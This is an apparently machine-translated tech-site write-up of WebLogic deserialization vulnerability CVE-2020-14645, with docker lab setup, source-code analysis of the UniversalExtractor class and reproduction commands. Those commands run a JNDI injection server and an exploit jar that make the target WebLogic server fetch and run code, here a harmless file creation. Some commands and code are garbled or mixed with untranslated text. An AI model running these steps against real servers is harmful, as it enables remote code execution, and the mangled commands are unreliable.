Shulou(Shulou.com)05/31 Report--

Today, I will talk to you about the analysis of WebLogic UniversalExtractor deserialization vulnerability CVE-2020-14645, which may not be well understood by many people. in order to make you understand better, the editor has summarized the following content for you. I hope you can get something according to this article.

1.1 statu

Complete vulnerability mining condition analysis and vulnerability reproduction.

1.2 introduction

WebLogic is the Java application server of Oracle Company in the United States, which is exactly a middleware, which is used for the integrated development and deployment of WEB applications, database applications and so on. The T3 protocol of WebLogic is easy to be used, so JNDI injection and deserialization are used to achieve the goal of remote code execution. Version with security flaw: WebLogic12.2.1.4.x, [JDK version: below 6u211; below 7u201; below 8u191]. JDK1.8.0_181 is used in this article.

1.3 vulnerability mining capability conditions

It is considered that the method of JNDI injection should be mastered and the logic function of coherence source code of WebLogic should be clear.

1.4 use method 1.4.1 environment

Under the WSL2 of WIN10, use docker image weblogic122140jdk8u181new:latest and ubuntu to create three containers, called weblogic122140jdk8u181new, ubuntu-JNDI and ubuntu-gongji, which act as WebLogic server, JNDI server and attack machine respectively. For the generation process of weblogic122140jdk8u181new container [ip:172.17.0.2], you need to enter the [WeblogicEnvironment] folder and refer to the [https://github.com/QAX-A-Team/WeblogicEnvironment] method to generate it. The command is as follows:

Docker build--build-arg JDK_PKG=jdk-8u181-linux-x64.tar.gz-- build-arg WEBLOGIC_JAR=fmw_12.2.1.4.0_wls_lite_generic.jar-t weblogic122140jdk8u181new. Docker run-d-p 7001-p 8453-p 8453-5556-- name weblogic122140jdk8u181new weblogic122140jdk8u181new

For the ubuntu-JNDI container [ip:172.17.0.3] generated by ubuntu image, copy jdk-8u181-linux-x64.tar.gz and JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar into the container, install jdk according to [https://www.cnblogs.com/hellojesson/p/11684299.html], and execute the command:

Java-jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar-C touch / tmp/CVE-A 172.17.0.3

For the ubuntu-gongji container [ip:172.17.0.4] generated by ubuntu image, copy jdk-8u181-linux-x64.tar.gz and CVE-2020-14645.jar into the container, and install jdk by referring to [https://www.cnblogs.com/hellojesson/p/11684299.html]. 1.4.2 the target executes the code [touch / tmp/CVE] on the WebLogic server to generate the CVE file under the tmp folder.

1.4.3 recreating the ubuntu-JNDI container will output the available LDAP links. The input result is as follows:

Enter the forwarding command in the attack machine ubuntu-gongji container as follows:

Note that the tail of the LDAP link at the red position is randomly generated and is different each time. The file generated after code execution appears in the weblogic122140jdk8u181new container:

1.4.4 Analysis method [omitting partial code analysis] when the program is running, it will jump to the coherence library in the red box below to perform some functions.

In the com.tangosol.util.extractor.UniversalExtractor class: in the protected transient String method in the protected transient String method in the com.tangosol.util.extractor.UniversalExtractor#extractComplex method of the universal ExtractorExtractor extract:

Class clzTarget = oTarget.getClass () Class [] clzParam = ClassHelper.getClassArray (aoParam) String sCName = this.getCanonicalName (); # [function or null without argument] boolean fProperty = this.isPropertyExtractor () Method method = nullif (fProperty) {# [only one condition for method object acquisition] String sBeanAttribute = Character.toUpperCase (sCName.charAt (0)) + sCName.substring (1); # [initials for (int cchPrefix = 0; cchPrefix)

< BEAN_ACCESSOR_PREFIXES.length && method == null; ++cchPrefix) method = ClassHelper.findMethod(clzTarget, BEAN_ACCESSOR_PREFIXES[cchPrefix] + sBeanAttribute, clzParam, false);#【对由get/is+字符组成的新字符进行处理】【ClassHelper.findMethod查找与指定类、方法名称和参数匹配的重要方法】【指定函数必须由"get"或"is"开头，且无参】}} else {method = ClassHelper.findMethod(clzTarget, this.getMethodName(), clzParam, false);} 初步认为，进入 else 分支中，即可调用任意方法，前提是 fProperty 为false。经研究，fProperty 由 !this.m_fMethod 决定，其赋值如下 init() 函数： protected void init() {String sCName = this.getCanonicalName();this.m_fMethod = sCName == null || sCName.endsWith("()");#【sCName为无参函数时符合要求】} fProperty 方面，当 sCName 不是无参函数且非空时，fProperty 为 true。继续分析 String sCName = this.getCanonicalName();，追溯到类com.oracle.common.internal.util.CanonicalNames 的方法com.oracle.common.internal.util.CanonicalNames#computeValueExtractorCanonicalName(java.lang.String, java.lang.Object[])： public static String computeValueExtractorCanonicalName(String sName, Object[] aoParam) {#【此方法要求函数必须是无参的】int nMethodSuffixLength = "()".length();if (aoParam != null && aoParam.length >

0) {return null;# [return empty parameter]} else if (! sName.endsWith ("()") {return sName; # [function name does not end with "()" return function name]} else {String sNameCanonical = sName;int nNameLength = sName.length (); String [] var5 = VALUE_EXTRACTOR_BEAN_ACCESSOR_PREFIXES; # ["get", "is"] int var6 = var5.length;for (int var7 = 0; var7

< var6; ++var7) {String sPrefix = var5[var7];int nPrefixLength = sPrefix.length();if (nNameLength >

NPrefixLength & & sName.startsWith (sPrefix) {sNameCanonical = Character.toLowerCase (sName.charAt (nPrefixLength)) + sName.substring (nPrefixLength + 1, nNameLength-nMethodSuffixLength); # [the first few digits of the function name are "get" / "is", remove the tail "()"] break;}} return sNameCanonical;}}

To sum up, there are three ways.

Method 1: look for a function name that starts with "get" / "is". [chances are slim]

Method 2: if fProperty is false, you need to look for a no-parameter function that starts with "get" / "is". [the chances are slim]

Method 3: observe that extract is called twice in the compare function, which will cause some values to change, resulting in defects. [validated invalid]

For method 1, you can find the compliance function name, and then find the serializable object (for example, control dataSource, you can control javax.sql.rowset.BaseRowSet#getDataSourceName for JNDI injection.

1.5 Patch Analysis

Not yet.

1.6 docker recurrence

Load the container tar as an image, for example:

Cat. / ubuntu-xxx.tar | docker import-ubuntu-new

Set up local area network and container ip, start container, for example: (1) Custom network

Docker network create-subnet=192.168.10.1/24 testnet

(2) start the docker container

Docker run-p 8088 hostname testt3 8088-p 8081 hostname testt3 8081-it-- hostname testt3-- network testnet-- ip 10.10.10.100 ubuntuxxx:xxx / bin/bash

Start the weblogic service when the ip of container [ubuntu-JNDI1106] is 172.17.0.3, the ip of container [ubuntu-gongji1106] is 172.17.0.5, and the ip of container [weblogic122140jdk8u181new1106] is 172.17.0.4. Enter the container [weblogic122140jdk8u181new1106] and enter the command

Sh / u01/app/oracle/Domains/ExampleSilentWTDomain/bin/startWebLogic.sh

Start successfully, as shown in the following figure.

Start the JNDI service. Enter the container [ubuntu-JNDI1106] and enter the command in turn

Source / etc/profilejava-jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar-C touch / tmp/CVE110667-A 172.17.0.3

You can see that the JNDI access link for jdk1.8 is [ldap://172.17.0.3:1389/usns1q], as shown below.

Launch an attack. Enter the container [ubuntu-gongji1106] and enter the command in turn

Source / etc/profilejava-jar CVE-2020-14645.jar 172.17.0.3:1389/usns1q http://172.17.0.4:7001

The "172.17.0.3:1389/usns1q" section is a JNDI link. A successful attack will return the weblogic version, as shown in the following figure.

After a successful attack, the container [ubuntu-JNDI1106] displays the transmission information, as shown below.

After a successful attack, the weblogic server generates a [CVE] file, as shown below.

After reading the above, do you have any further understanding of the analysis of WebLogic UniversalExtractor deserialization vulnerability CVE-2020-14645? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.